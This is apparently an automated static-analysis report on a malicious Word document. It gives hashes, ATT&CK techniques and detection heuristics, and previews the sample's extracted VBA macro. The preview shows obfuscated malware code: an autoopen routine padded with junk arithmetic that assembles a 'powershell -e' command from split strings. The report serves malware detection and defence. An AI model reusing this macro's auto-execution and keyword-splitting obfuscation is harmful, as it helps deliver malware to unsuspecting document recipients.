Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 71dd9d4f7b07f04b…

MALICIOUS

Office (OLE)

207.9 KB Created: 2019-03-13 13:15:00 Authoring application: Microsoft Office Word First seen: 2019-10-01
MD5: 2f83bb776878951553ca9e88f7534761 SHA-1: 81727a2fb7ae05a957645d96cfc3242acfac80d3 SHA-256: 71dd9d4f7b07f04bf0394a425c77e6834a991529f0044ca34553bf37ebbb117c
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. The macro utilizes obfuscation techniques, including splitting keywords to reassemble API names like 'Win32_Process', and uses GetObject to execute code. This indicates the macro's purpose is to download and execute a second-stage payload, a common technique for malware delivery.

Heuristics 8

  • ClamAV: Doc.Downloader.00536d-6895734-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.00536d-6895734-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 43966 bytes
SHA-256: ce238ff237be5acbd3bffe453cc78129356f902cb2ed24436c2d11e705da7dba
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "FXAB4CXw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function hUAAwB()
   If rBAADAA = UAAoDGAB Then
vcAGXQw = Chr(wAAADB)
oABXB_ = mAABADG + ChrW(zGUo__) * 840847694 * CBool(13688527) + 474000250 / Round(SADAU_kD) - RZ4AAD + Sqr(969985382) - 864222629 * CByte(361781859)
tokXBAA = Chr(IDXDcD)
End If
   If mZAxD4A = m41AAQG Then
QkoAQXA = Chr(HAUBAXUG)
HAADABA = t_D1GkQ + ChrW(QcQD1AQk) * 71652099 * CBool(886405306) + 257062441 / Round(wcXUAZA) - PAAAUAxA + Sqr(744307070) - 803808797 * CByte(779699605)
iCQAD1G = Chr(BAD_kDA)
End If
   If AAAXAwc = QBQD11A Then
OCGAQAX = Chr(TXAAAA)
pAA4k4A = dAAAUCC + ChrW(pABDUxk) * 26115350 * CBool(594482923) + 170981871 / Round(v4DCZUDA) - bAkAQZA + Sqr(984005377) - 258158391 * CByte(937426555)
TwZAAo = Chr(AcQQGA)
End If
   If lAA1ZB = V1x_4oxG Then
fUA_cUw = Chr(tABADk)
hAkCDQB = woAxAA + ChrW(wDAAA_A) * 869050044 * CBool(804211230) + 94536589 / Round(wGDAUDA) - MAABCUD + Sqr(192750319) - 34608862 * CByte(435658901)
tDQAX1_ = Chr(cUG1D1)
End If
   If fAAA_oU = LUAkAw Then
wAABDDZ = Chr(FAQBAxBA)
kDAckw_ = zxAQwDB + ChrW(ZZCGxAQk) * 268422185 * CBool(438852457) + 389059966 / Round(jCGBQoC) - jAoAUB_ + Sqr(320492789) - 758102058 * CByte(249117522)
w14xA1w = Chr(BACUAAkU)
End If
   If UDG1XDAZ = LAUAAUAG Then
lAGADAZ = Chr(QQACZoA)
OwAQA1 = CADADAB + ChrW(DABCAo) * 168539386 * CBool(97910033) + 712115013 / Round(QA1_A4) - EwADAA + Sqr(207592537) - 174361722 * CByte(73248147)
jDAZAD = Chr(SDAABD)
End If
   If vkDZxGA = PBAQAQBG Then
KwcADUw = Chr(EGDAAc)
EcD_XA1Q = MABwGDG + ChrW(zDAkQDB) * 744836428 * CBool(245276904) + 192014635 / Round(oABZUBAc) - cBACAQoc + Sqr(733965625) - 762902059 * CByte(303222300)
sDoBUDA = Chr(Go_AUA)
End If
   If TBAAGUAG = McXCQX4 Then
QkAocQA4 = Chr(vADGQAw)
GUQAAQA = coo_UXZ + ChrW(wXoCAw) * 187664420 * CBool(210890131) + 748791201 / Round(hU1AXo) - qQDBDDA + Sqr(50165881) - 615361918 * CByte(434617790)
HQCAUB = Chr(bAAQADx)
End If
End Function
Sub autoopen()
On Error Resume Next
   If r4wDXCC = zAUUCcAA Then
jAABAZ = Chr(vAxGUAGC)
hAD1w1c = rcDDDZAC + ChrW(nQo_AxUQ) * 331273200 * CBool(27273003) + 452637665 / Round(zBDABU) - tCZAABAC + Sqr(150328992) - 350283579 * CByte(333514268)
MAQ_AA = Chr(h_QDcDw)
End If
   If KCDA4Z = occAAADU Then
fUAAAkGC = Chr(lDcZAA)
KZABAAA1 = OUA_B4 + ChrW(HxkCDAAx) * 233039044 * CBool(669821698) + 981870913 / Round(fADXUDx) - WQAQGAUA + Sqr(539781038) - 389743467 * CByte(852176396)
U4AAXC = Chr(D1BGGQBA)
End If
   If VAAGDUQX = tAQAoAU Then
bAAABQGQ = Chr(UG1U_DA_)
BAcAcAA = wZAAQA + ChrW(wAoGoQA) * 48060244 * CBool(839004474) + 581674388 / Round(zAXUZo) - VAACAAA + Sqr(254128243) - 481508475 * CByte(598742438)
HxG1ACAD = Chr(IABXAGA)
End If
SU4DGABo (McCkACwA + "po" + dwAZAC + "wersh" + vBAAABGZ + "ell -e " + TA1AAQ + uBUUADx + XokDBA + PAAACQ + CAxBkBB + zQACAUZ)
   If zXkQDAZU = mCBcACA Then
Y_UoAkD1 = Chr(icAACwA)
O1AxQQB = aABkUA + ChrW(O1wGcA) * 295804366 * CBool(271502775) + 144036889 / Round(ooQwAADB) - zDABDQQ + Sqr(848151534) - 527374704 * CByte(597147512)
hCADA1G = Chr(jcBQkAwC)
End If
   If q1wxQk1A = aAUAGZwo Then
ikBA1UU_ = Chr(VZABCA)
iDA_C_A = QGDA1AZ + ChrW(XoUAAAAU) * 549579165 * CBool(997995911) + 480272976 / Round(LcAX1DXA) - KADAAZk + Sqr(476233654) - 922639560 * CByte(268984209)
hAZAAAAA = Chr(nQAUxDQ)
End If
   If nDQAk_wk = l1U41Akk Then
ICGAco = Chr(JZAADxBX)
HxQAAQ1A = wAAkAAQ + ChrW(pDwAACA) * 624836757 * CBool(406814430) + 213276037 / Round(FAUcQZ) - G_AZAAB + Sqr(69436041) - 21137613 * CByte(425364)
oA4DABA = Chr(voUUAocA)
End If
End Sub
Function EDZDAcD()
   If CAXGcxx = m44QUXAA Then
nAUAA_ = Chr(IZAAUxAc)
oGAXxcGQ = GAAxAAA + ChrW(YBX4XBA) * 900071554 * CBool(598844070) + 198325339 / Round(UGAx_A) - VZBcUGQ + Sqr(756088232) - 897006791 * CByte(982120095)
PDAXBA = Chr(ODA4oQ)
End If
   If RGx
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.